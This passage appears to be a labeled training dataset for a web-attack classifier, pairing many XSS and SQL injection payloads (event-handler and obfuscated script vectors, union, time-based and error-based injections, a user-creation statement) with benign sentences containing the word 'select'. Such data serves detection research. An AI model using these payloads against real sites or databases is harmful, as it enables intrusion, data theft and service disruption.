onpointerleave=alert(1)>XSS</video>,1,XSS,8711 +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;,1,XSS,940 +"<a href=""\xE2\x81\x9Fjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,518 +select current_setting('port');,2,SQLi,22449 +&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;,1,XSS,1357 +[1].find(alert),1,XSS,1924 +"select * from users where id = '1' or ( \ ) = 1 union select 1,@@VERSION -- 1'",2,SQLi,11973 +1' ) ) ) or sleep ( 5 ) and ( ( ( 'ecur' = 'ecur,2,SQLi,15830 +"-3411' ) ) ) union all select 3185,3185,3185,3185,3185,3185,3185,3185--",2,SQLi,18573 +"<xmp onbeforecut=""alert(1)"" contenteditable>test</xmp>",1,XSS,7754 +"1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'zenl' like 'zenl",2,SQLi,12849 +"<div draggable=""true"" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub>",1,XSS,5039 +It's pretty easy to select one and tweak their appearance.,0,normal,25895 +Double Fun will screen in select theaters tonight (September 24th) only.,0,normal,26187 +<abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus>,1,XSS,6121 +"1' ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 'qeet' = 'qeet",2,SQLi,17857 +<data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus>,1,XSS,5793 +"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('')</SCRIPT>"">",1,XSS,7198 +"<image oncontextmenu=""alert(1)"">test</image>",1,XSS,3481 +1;SELECT%20*,2,SQLi,10088 +"select * from users where id = 1 or "" ( ,"" = 1 or 1 = 1 -- 1",2,SQLi,12012 +"1' ) where 4786 = 4786 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,22385 +"))) AND ELT(1337=1337,SLEEP(5)) AND (((1337""=""1337",2,SQLi,11195 +To unlock nokia mobile phones you should select the operator company where you bought your cell phone or where your cell phone is locked.,0,normal,25219 +<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus>,1,XSS,2715 +"; if not ( substring ( ( select @@version ) ,25,1 ) <> 0 ) waitfor delay '0:0:2' --",2,SQLi,11415 +1' ) ) and 2401 = 4693 and ( ( 'ssrm' = 'ssrm,2,SQLi,14066 +"select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ""gjtx"" like ""gjtx",2,SQLi,13811 +Insert text.,0,normal,23043 +select ( case when ( 9299 = 2760 ) then 1 else 9299* ( select 9299 from master..sysdatabases ) end ) --,2,SQLi,14036 +"select * from users where id = 1 or \<\ union select 1,@@VERSION -- 1",2,SQLi,11652 +<frame onpointermove=alert(1)>XSS</frame>,1,XSS,4158 +1' ) ) as zari where 6847 = 6847,2,SQLi,17830 +"<aside ondblclick=""alert(1)"">test</aside>",1,XSS,7257 +I'm thinking of where to have a family picnic.,0,normal,23797 +"1, ( cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 7823 = 7823 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) )",2,SQLi,17167 +<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>,1,XSS,3024 +1 ) as bhdj where 4472 = 4472,2,SQLi,12360 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></iframe>",1,XSS,8102 +1'|| ( select 'uedy' where 8816 = 8816,2,SQLi,19575 +"1"" where 3740 = 3740 rlike sleep ( 5 ) #",2,SQLi,18539 +Filter the results.,0,normal,22795 +"1%"" ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13166 +1' ) ) rlike sleep ( 5 ) and ( ( 'qitl' like 'qitl,2,SQLi,15950 +"<slot draggable=""true"" ondrag=""alert(1)"">test</slot>",1,XSS,2458 +<s onpointerup=alert(1)>XSS</s>,1,XSS,1752 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--",2,SQLi,10478 +<abbr onpointerup=alert(1)>XSS</abbr>,1,XSS,8212 +"-4031%"" union all select 9566--",2,SQLi,12873 +1' ) where 9317 = 9317 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,18036 +<kbd onpointerout=alert(1)>XSS</kbd>,1,XSS,3016 +-2784 ) where 5261 = 5261 or 3472 = 1728#,2,SQLi,19179 +1'|| ( select 'rdqv' from dual where 1894 = 1894,2,SQLi,20049 +<input onpointerout=alert(1)>XSS</input>,1,XSS,6926 +or pg_sleep ( __TIME__ ) --,2,SQLi,11837 +"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 'juhi' like 'juhi",2,SQLi,19473 +Select the best restaurant.,0,normal,24244 +"-3667%' ) ) union all select 3560,3560,3560--",2,SQLi,18713 +Insert memory.,0,normal,23027 +"admin"" #",2,SQLi,9887 +1 ) as selm where 5759 = 5759,2,SQLi,18443 +or ''-',2,SQLi,9843 +expression(alert('')),1,XSS,8421 +"1"" ) as kslq where 8669 = 8669 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,22051 +"<style>@keyframes x{}</style><applet style=""animation-name:x"" onanimationend=""alert(1)""></applet>",1,XSS,4623 +"Select McDonalds locations in Scotland, England, and Australia now play Mozart at select hours in an effort to soothe some of their more inebriated customers.",0,normal,25581 +"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 4537 = 4537",2,SQLi,16766 +Select the movie.,0,normal,22807 +"<input onmouseup=""alert(1)"">test</input>",1,XSS,7912 +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus>,1,XSS,3111 +"1"" ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14969 +<blockquote onpointermove=alert(1)>XSS</blockquote>,1,XSS,1706 +"<noembed draggable=""true"" ondragstart=""alert(1)"">test</noembed>",1,XSS,7168 +"1"" ) as tnux where 4888 = 4888 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,14842 +<aside onpointerover=alert(1)>XSS</aside>,1,XSS,7052 +<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>,1,XSS,1123 +-6665' ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 'winx' = 'winx,2,SQLi,19012 +"-5591%"" ) ) order by 1--",2,SQLi,15348 +"1' ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( 'jylk' = 'jylk",2,SQLi,19245 +"<picture oncut=""alert(1)"" contenteditable>test</picture>",1,XSS,4246 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17",2,SQLi,10651 +"<bdi draggable=""true"" ondragend=""alert(1)"">test</bdi>",1,XSS,3252 +"<video onmouseleave=""alert(1)"">test</video>",1,XSS,7889 +<q id=x tabindex=1 onfocusin=alert(1)></q>,1,XSS,3397 +"1%' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( '%' = '",2,SQLi,13723 +"<spacer onkeyup=""alert(1)"" contenteditable>test</spacer>",1,XSS,4775 +"1'|| ( select 'zifu' from dual where 4822 = 4822 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13823 +"<img src=x onerror=\x11""javascript:alert(1)"">",1,XSS,636 +"Shoppers can either choose the items they want placed in the basket, or select a specified basket theme that features correlated items.",0,normal,25517 +"-8353' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'ptlz' = 'ptlz",2,SQLi,21536 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'gsdq' = 'gsdq",2,SQLi,13163 +"Select ""Wallet"" and press X, then select ""Add Funds"" and press X.",0,normal,25629 +1' ) ) and 3814 = 4272--,2,SQLi,13958 +"1' ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,17635 +"<section onkeydown=""alert(1)"" contenteditable>test</section>",1,XSS,7583 +"1 ) ) union all select null,null,null#",2,SQLi,19842 +<frame id=x tabindex=1 onactivate=alert(1)></frame>,1,XSS,4817 +I need to decide where to go for the weekend.,0,normal,23652 +"<track onmousedown=""alert(1)"">test</track>",1,XSS,5889 +"<aside onpaste=""alert(1)"" contenteditable>test</aside>",1,XSS,6271 +-8233' or 9538 = 1882#,2,SQLi,20729 +WHERE 1=1 AND 1=1#,2,SQLi,10133 +"<style>:target {transform: rotate(180deg);}</style><img id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></img>",1,XSS,6948 +"select * from users where id = 1 or $+<\ union select 1,@@VERSION -- 1",2,SQLi,11953 +And to select well out of those choices is pretty remarkable.,0,normal,26318 +<iframe onpointerenter=alert(1)>XSS</iframe>,1,XSS,8770 +select,0,normal,26566 +"1' or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'nazb' = 'nazb",2,SQLi,21616 +"1%' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( '%' = '",2,SQLi,14422 +1'|| ( select 'etvo' from dual where 1557 = 1557,2,SQLi,13308 +"<meta draggable=""true"" ondragend=""alert(1)"">test</meta>",1,XSS,3825 +Select your trip.,0,normal,24986 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#",2,SQLi,10601 +"1"" where 9332 = 9332 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15487 +-2022 ) ) ) or 6812 = 3516 and ( ( ( 3896 = 3896,2,SQLi,20233 +"Plus, for a limited time only: up to 40% off select outdoor furniture Target: up to 25% off select home styles, plus an extra 10% on furniture using promo code LOVEMOM; up to 35% off select outdoor living plus an extra 10% off using promo code OUTDOOR West Elm: Premiere One-Day Event: Up to 40% off select items, including dining sets, coffee tables, chairs and more.",0,normal,25730 +<input onfocusout=alert(1) id=x><input autofocus>,1,XSS,7610 +Select your achieve.,0,normal,24973 +"<tt onmouseover=""alert(1)"">test</tt>",1,XSS,1676 +<table onpointerup=alert(1)>XSS</table>,1,XSS,4388 +"-7412"" ) as qngt where 2041 = 2041 union all select 2041--",2,SQLi,17803 +"<h1 onclick=""alert(1)"">test</h1>",1,XSS,4451 +<custom tags onpointerover=alert(1)>XSS</custom tags>,1,XSS,5028 +"<hr onmouseout=""alert(1)"">test</hr>",1,XSS,4321 +"1"" ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ""rurz"" = ""rurz",2,SQLi,20218 +"<font onmousemove=""alert(1)"">test</font>",1,XSS,2596 +"-5945' ) ) ) union all select 4266,4266,4266,4266,4266--",2,SQLi,14198 +<abbr onpointerdown=alert(1)>XSS</abbr>,1,XSS,4171 +"select * from users where id = 1 or ""$["" or 1 = 1 -- 1",2,SQLi,11343 +Select club.,0,normal,24507 +"1' ) ) as prxm where 1267 = 1267 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13742 +"<a href=""\xE2\x80\x84javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,502 +1 ) and sleep ( 5 ),2,SQLi,21413 +javascript:alert('XSS');,1,XSS,9420 +"><script+src=http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json""></script>",1,XSS,9780 +"-3361'|| ( select 'msfi' where 4806 = 4806 union all select 4806,4806,4806,4806,4806,4806,4806,4806,4806--",2,SQLi,18349 +<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus>,1,XSS,1890 +<b onpointerover=alert(1)>XSS</b>,1,XSS,3844 +"1 ) where 8164 = 8164 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,15116 +"<style onkeyup=""alert(1)"" contenteditable>test</style>",1,XSS,5986 +"<u oncut=""alert(1)"" contenteditable>test</u>",1,XSS,2752 +<ul onpointerenter=alert(1)>XSS</ul>,1,XSS,1720 +"select * from users where id = 1 or "".#"" or 1 = 1 -- 1",2,SQLi,11946 +<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus>,1,XSS,5749 +//,2,SQLi,10014 +"1"" ) ) ) union all select null,null,null,null,null,null#",2,SQLi,16535 +"1"" ) where 7578 = 7578 and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,16401 +<dd id=x tabindex=1 onfocusin=alert(1)></dd>,1,XSS,3509 +select ( case when ( 5914 = 2314 ) then 5914 else 1/ ( select 0 ) end ) --,2,SQLi,17288 +Select the best recipe.,0,normal,24307 +"<fieldset onkeydown=""alert(1)"" contenteditable>test</fieldset>",1,XSS,3900 +"<meta onmousedown=""alert(1)"">test</meta>",1,XSS,2744 +"<div draggable=""true"" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset>",1,XSS,6614 +"<datalist onmouseout=""alert(1)"">test</datalist>",1,XSS,5236 +"Select ""Uninstall,"" then choose ""Uninstall All"" to confirm the deletion.",0,normal,25630 +"1' in boolean mode ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,17329 +"You don't need to select quests to earn loot, though.",0,normal,25039 +"1234 "" AND 1 = 0 UNION ALL SELECT ""admin"", ""81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,11390 +<output onpointerup=alert(1)>XSS</output>,1,XSS,3489 +"1"" waitfor delay '0:0:5' and ""dvfr"" like ""dvfr",2,SQLi,13009 +I want to choose a new book to read.,0,normal,23671 +1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( 'ayol' = 'ayol,2,SQLi,13397 +So why would he suddenly want her to select the clothes he wore to an informal party where he knew no one.,0,normal,25502 +"<br SIZE=""&{document.vulnerable=true}"">",1,XSS,1433 +"<div draggable=""true"" contenteditable>drag me</div><abbr ondrop=alert(1) contenteditable>drop here</abbr>",1,XSS,7269 +<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus>,1,XSS,4506 +"<script>alert(""XSS"");</script>&search=1",1,XSS,906 +"1"" ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ""dtfg"" = ""dtfg",2,SQLi,12518 +"<img \x00src=x onerror=""javascript:alert(1)"">",1,XSS,619 +"select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,11406 +"-1407 where 1186 = 1186 union all select 1186,1186,1186,1186,1186--",2,SQLi,15286 +create user name identified by 'pass123' --,2,SQLi,9977 +"1'+ ( select 'qzcx' where 9524 = 9524 and elt ( 3069 = 8430,8430 ) ) +'",2,SQLi,16258 +1' ) ) as nhkp where 8030 = 8030,2,SQLi,13502 +"<style>@keyframes x{}</style><option style=""animation-name:x"" onanimationend=""alert(1)""></option>",1,XSS,7921 +"<video onerror=""javascript:javascript:alert(1)""><source>",1,XSS,580 +tz_offset,2,SQLi,10017 +"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 'beju' like 'beju",2,SQLi,13029 +) waitfor delay '0:0:20' --,2,SQLi,10831 +"1%"" ) ) and 7533 = 7533 and ( ( ""%"" = """,2,SQLi,12153 +<svg><map onload=alert(1)></map>,1,XSS,7881 +<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus>,1,XSS,7414 +` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11148 +Choose fields where necessary.,0,normal,23306 +"&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;",1,XSS,1336 +<svg><big onload=alert(1)></big>,1,XSS,6287 +"<i oncontextmenu=""alert(1)"">test</i>",1,XSS,6865 +1' and 7533 = 7533 and 'frvk' = 'frvk,2,SQLi,13877 +"1"" ) ) ) union all select null#",2,SQLi,19434 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual ) +'",2,SQLi,19748 +Where's the best place to take a stroll?,0,normal,23840 +Select a flavor for the ice cream.,0,normal,24095 +"; if not ( substring ( ( select @@version ) ,25,1 ) <> 8 ) waitfor delay '0:0:2' --",2,SQLi,11969 +1' ) where 8776 = 8776 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,14970 +Save up to 35% off select McCafe K-Cups and Coffee,0,normal,25674 +"<b ondblclick=""alert(1)"">test</b>",1,XSS,5167 +"-6948"" ) ) as ojjl where 1300 = 1300 or 6872 = 6872--",2,SQLi,15536 +"><script+src=https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)""></script>",1,XSS,9743 +"<code onkeydown=""alert(1)"" contenteditable>test</code>",1,XSS,2179 +<progress onpointerdown=alert(1)>XSS</progress>,1,XSS,8859 +"1 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,19200 +"1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,17099 +<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus>,1,XSS,6251 +"<div draggable=""true"" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup>",1,XSS,1695 +select case when 8237 = 9948 then 1 else null end--,2,SQLi,20201 +<main onpointerenter=alert(1)>XSS</main>,1,XSS,2253 +-6081 where 3681 = 3681 or 2603 = 3138--,2,SQLi,16453 +"1' in boolean mode ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #",2,SQLi,12050 +"<dfn onbeforecut=""alert(1)"" contenteditable>test</dfn>",1,XSS,7213 +<address onpointerout=alert(1)>XSS</address>,1,XSS,7242 +"<pre onkeypress=""alert(1)"" contenteditable>test</pre>",1,XSS,7568 +Filter the irrelevant comments.,0,normal,22665 +"<style>:target {transform: rotate(180deg);}</style><listing id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></listing>",1,XSS,8427 +He selected a font for the website design.,0,normal,23854 +"To select an avatar from the gallery, click Show Gallery.",0,normal,25212 +"Also like Sling, Vue has local broadcast networks in select markets.",0,normal,26344 +"<form draggable=""true"" ondragenter=""alert(1)"">test</form>",1,XSS,6165 +"The same son also published an edition of Paulding's Select Works (4 vols., 1867-1868), and a biography called.",0,normal,25345 +"1' ) as woka where 4316 = 4316 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,17291 +"Customers can also select ""Mx."" in lieu of Ms., Mrs.",0,normal,26212 +-1621' in boolean mode ) order by 1--,2,SQLi,13925 +"&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;",1,XSS,1312 +1' ) ) ) and 2006 = 2006,2,SQLi,21476 +"<bdi oncut=""alert(1)"" contenteditable>test</bdi>",1,XSS,5647 +"<data onbeforecut=""alert(1)"" contenteditable>test</data>",1,XSS,1710 +Filter the dust.,0,normal,22825 +<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus>,1,XSS,2172 +"-2717"" or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,19162 +"<style>@keyframes x{}</style><samp style=""animation-name:x"" onanimationstart=""alert(1)""></samp>",1,XSS,2749 +"Currently, you can take $100-$79.993 off select PlayStation 4 and Xbox One consoles; get a free pre-owned game when you buy two pre-owned games (select titles); get $200 off select HTC Vive VR headsets; $30 off the Arctis 3 headset from SteelSeries; and save up to 40% on computer accessories.",0,normal,26213 +&#60;,1,XSS,9732 +"<div draggable=""true"" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small>",1,XSS,4794 +<optgroup onpointerup=alert(1)>XSS</optgroup>,1,XSS,8440 +"If you need to delete files, tap on Select, select the files you wish to delete, then tap ""Delete"" in the lower right corner.3.",0,normal,26003 +"1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'gfll' = 'gfll",2,SQLi,20066 +1'+ ( select xzvf where 9727 = 9727,2,SQLi,17596 +"<samp onkeypress=""alert(1)"" contenteditable>test</samp>",1,XSS,2713 +<center onpointerleave=alert(1)>XSS</center>,1,XSS,2728 +"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( 'crkz' = 'crkz",2,SQLi,19105 +top[“al”+”ert”](1),1,XSS,4094 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'kerg' like 'kerg,2,SQLi,15509 +"1%"" and 7533 = 7533 and ""%"" = """,2,SQLi,21699 +&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;,1,XSS,1340 +"ORDER BY 1,SLEEP(5),3#",2,SQLi,10338 +"1%"" ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12801 +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>,1,XSS,849 +function,0,normal,23127 +"1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116",2,SQLi,11317 +"1' or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'ynpr' = 'ynpr",2,SQLi,13583 +<hgroup onpointerenter=alert(1)>XSS</hgroup>,1,XSS,5192 +"-1339 ) ) ) union all select 2938,2938,2938,2938,2938,2938#",2,SQLi,12431 +1%' ) waitfor delay '0:0:5'--,2,SQLi,18918 +ORDER BY 9#,2,SQLi,10176 +"<ins onbeforecopy=""alert(1)"" contenteditable>test</ins>",1,XSS,3092 +"-3343'|| ( select 'ssvt' where 5179 = 5179 union all select 5179,5179,5179,5179,5179,5179,5179,5179--",2,SQLi,16824 +"1' ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( 'szib' like 'szib",2,SQLi,14130 +1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( 'ytxg' = 'ytxg,2,SQLi,17788 +"<slot onmouseleave=""alert(1)"">test</slot>",1,XSS,3722 +"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( '%' = '",2,SQLi,14892 +"<big draggable=""true"" ondrag=""alert(1)"">test</big>",1,XSS,6400 +1%' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( '%' = ',2,SQLi,20990 +"<select draggable=""true"" ondragend=""alert(1)"">test</select>",1,XSS,6268 +<rb id=x tabindex=1 onfocus=alert(1)></rb>,1,XSS,7111 +<plaintext onpointerover=alert(1)>XSS</plaintext>,1,XSS,6871 +<IMG SRC=&{javascript:alert(1);};>,1,XSS,747 +"1%' union all select null,null,null,null,null,null--",2,SQLi,17221 +1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,19692 +"1' and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and 'ankn' = 'ankn",2,SQLi,19007 +<rp id=x tabindex=1 onfocusin=alert(1)></rp>,1,XSS,4640 +Select your control.,0,normal,24839 +"-5026' where 7324 = 7324 union all select 7324,7324--",2,SQLi,13105 +"<meta onclick=""alert(1)"">test</meta>",1,XSS,2139 +<output onpointerleave=alert(1)>XSS</output>,1,XSS,3886 +"<i onbeforecut=""alert(1)"" contenteditable>test</i>",1,XSS,7776 +Randomly select a dish.,0,normal,24238 +"-6307' where 8916 = 8916 union all select 8916,8916,8916,8916,8916,8916,8916--",2,SQLi,18501 +<script onload=alert(1) src=validjs.js></script>,1,XSS,2542 +"<fieldset onkeyup=""alert(1)"" contenteditable>test</fieldset>",1,XSS,6052 +"<blink onmouseleave=""alert(1)"">test</blink>",1,XSS,3227 +"1 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select 